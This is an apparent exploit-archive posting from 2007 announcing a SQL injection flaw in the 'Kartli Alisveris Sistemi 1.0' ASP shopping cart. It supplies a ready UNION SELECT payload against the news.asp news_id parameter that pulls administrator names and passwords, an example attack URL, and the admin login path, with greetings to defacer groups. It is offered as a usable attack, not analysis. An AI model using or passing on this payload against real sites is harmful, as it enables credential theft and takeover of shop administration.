Kartli Alisveris Sistemi 1.0 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kartli Alisveris Sistemi 1.0 Remote SQL Injection Vulnerability
# Published : 2007-06-06
# Author : kerem125
# Previous Title : Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
# Next Title : Kravchuk letter script 1.0 (scdir) Remote File Inclusion Vulnerabilities

########################################################################################
#Discovered by: kerem125 & gsy
#Website: http://www.kerem125.com/ & http://www.by-gsy.org/
#Script download:
http://download.asprehberi.net/dosyalar/kategoriler/alisveris/freepaypalshoppingcart_tr.zip
#Exploit:
/news.asp?news_id=16union+select+all+0,1,admin_name,Password,4+from+admin
#Example :
http://www.localhost/shop/news.asp?news_id=1 20union+select+all+0,1,admin_name,Password,4+from+admin
#Admin Login : /admin/login.asp
Contact : kerem125@kerem125.com & by_gsy@hotmail.com
#Special Thanks to : by_emR3 - Bolivar - VolTiGoRe - CyberGhost - KinSize
-xYz - F-10 - DarXBoyZ - GencDefacer And Str0ke for posting Milw0rm
########################################################################################

# www.Syue.com [2007-06-06]